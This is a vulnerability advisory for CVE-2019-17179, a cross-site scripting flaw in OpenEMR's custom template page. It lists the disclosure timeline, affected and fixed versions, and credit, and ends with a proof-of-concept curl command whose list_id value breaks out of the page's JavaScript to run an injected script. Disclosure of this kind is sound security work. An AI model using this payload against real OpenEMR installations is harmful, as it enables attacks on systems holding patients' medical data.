CVE-2019-17179
XSS in library/custom_template/add_template.php in
OpenEMR before 5.0.2.1 allows a malicious user to
execute code in the context of a victim's browser via a crafted list_id query parameter.
Timeline
- Discovered: October 1, 2019
- Pull Request Issued: October 1, 2019
- Reported: October 2, 2019
- OpenEMR merged pull Request: October 2, 2019
- CVE ID issued: October 4, 2019
- OpenEMR Release: October 10, 2019 (5.0.2.1)
Version Details
Fixed-In Version: 5.0.2.1
Affected Versions:
- 4.1.0
- 4.1.1
- 4.1.2
- 4.1.2.3
- 4.1.2.6
- 4.1.2.7
- 4.2.0
- 4.2.1
- 4.2.2
- 5.0.0
- 5.0.0.5
- 5.0.0.6
- 5.0.1
- 5.0.1.1
- 5.0.1.2
- 5.0.1.3
- 5.0.1.4
- 5.0.1.5
- 5.0.1.6
- 5.0.1.7
- 5.0.2
Credit
Will Porter, Lodestone Security (https://www.lodestonesecurity.com/)
References
POC Exploit
Assuming OpenEMR is running on localhost
curl "http://localhost/openemr/library/custom_template/add_template.php?list_id=1}});}}};alert(%27xss%27);function%20derp(){if%20(true){if(true){%20$.ajax({type:%22POST%22,data:{tempateid:%201"